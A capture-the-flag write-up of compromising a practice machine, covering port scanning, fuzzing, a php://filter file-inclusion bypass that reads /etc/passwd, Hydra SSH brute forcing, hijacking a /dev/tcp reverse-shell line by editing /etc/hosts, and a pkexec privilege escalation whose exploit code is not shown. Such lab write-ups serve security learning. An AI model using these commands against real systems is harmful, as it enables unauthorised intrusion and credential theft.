Enumerations
Let’s start with a quick Nmap scan.
Nmap Scan
Starting Nmap 7.80 ( https://nmap.org ) at 2023-07-16 15:48 +01
Nmap scan report for 10.10.27.215
Host is up (0.057s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Atlanta - Free business bootstrap template
|_Requested resource was /index.php?page=home.html
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds
It appears that there is an Apache2 web server running on port 80. I have come across a parameter in the URL. Let’s investigate it further by examining the following URL:
"http://10.10.27.215/index.php?page=home.html".
Let’s proceed with brute-forcing to discover potential files within this parameter.
ffuf -u http://10.10.27.215/index.php?page=FUZZ -w /usr/share/wordlists/dirb/common.txt -fw 1
index.php [Status: 200, Size: 351, Words: 45, Lines: 18]
By visiting the provided endpoint, we have discovered a PHP code comment within the source code.
<?php
function sanitize_input($param) {
$param1 = str_replace("../","",$param);
$param2 = str_replace("./","",$param1);
return $param2;
}
$page = $_GET['page'];
if (isset($page) && preg_match("/^[a-z]/", $page)) {
$page = sanitize_input($page);
readfile($page);
} else {
header('Location: /index.php?page=home.html');
}
?>
I successfully bypassed the PHP str_replace function by utilizing php:///filter/resource=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
blue:x:1000:1000:blue:/home/blue:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
red:x:1001:1001::/home/red:/bin/bash
It appears that there are three users: root, blue, and red.
I attempted to locate some logs for potential log poisoning, but unfortunately, I couldn’t.
Finally, I have managed to obtain some valuable information.
The user “blue” attempted to enhance the security of their password by implementing various rules. However, I was able to get access. I generated a password list and successfully performed a brute force attack on “blue“‘s password using Hydra.
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-16 16:16:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 77 login tries (l:1/p:77), ~5 tries per task
[DATA] attacking ssh://10.10.27.215:22/
[22][ssh] host: 10.10.27.215 login: blue password: [PASS]
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-07-16 16:16:51
Priv
I keep getting msg from the shell
And the password keeps changing every time the shell kicks me out.
Every time I receive a message, I start another shell to continue the process.
By running pspy64;
2023/07/16 15:25:57 CMD: UID=1001 PID=2685 | bash -c nohup bash -i >& /dev/tcp/redrules.thm/9001 0>&1 &
I added my IP to /etc/hosts in order to obtain a reverse shell.
blue@red:/tmp$ echo 10.18.81.222 redrules.thm >> /etc/hosts
achux@Fs:~$ nc -lnvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.10.27.215 33578
bash: cannot set terminal process group (2955): Inappropriate ioctl for device
bash: no job control in this shell
red@red:~$
red@red:~$ ll
total 36
drwxr-xr-x 4 root red 4096 Aug 17 2022 ./
drwxr-xr-x 4 root root 4096 Aug 14 2022 ../
lrwxrwxrwx 1 root root 9 Aug 14 2022 .bash_history -> /dev/null
-rw-r--r-- 1 red red 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 red red 3771 Feb 25 2020 .bashrc
drwx------ 2 red red 4096 Aug 14 2022 .cache/
-rw-r----- 1 root red 41 Aug 14 2022 flag2
drwxr-x--- 2 red red 4096 Aug 14 2022 .git/
-rw-r--r-- 1 red red 807 Aug 14 2022 .profile
-rw-rw-r-- 1 red red 75 Aug 14 2022 .selected_editor
-rw------- 1 red red 0 Aug 17 2022 .viminfo
.git
weird folder!!
red@red:~/.git$ ll
total 40
drwxr-x--- 2 red red 4096 Aug 14 2022 ./
drwxr-xr-x 4 root red 4096 Aug 17 2022 ../
-rwsr-xr-x 1 root root 31032 Aug 14 2022 pkexec*
red@red:~/.git$ ./pkexec --version
pkexec version 0.105
I believe we can exploit that situation.
Simply copying and pasting the exploit will not be sufficient to achieve our goal. We need to understand the exploit thoroughly and tailor it to the specific context in order to successfully exploit the vulnerability.
we need to change this part;
# whoami
root
Congratulations on successfully compromising the machine! Well done! If you need any further assistance in the future, feel free to reach out. Take care and goodbye! 💜
Achux21
2023 - 07 - 07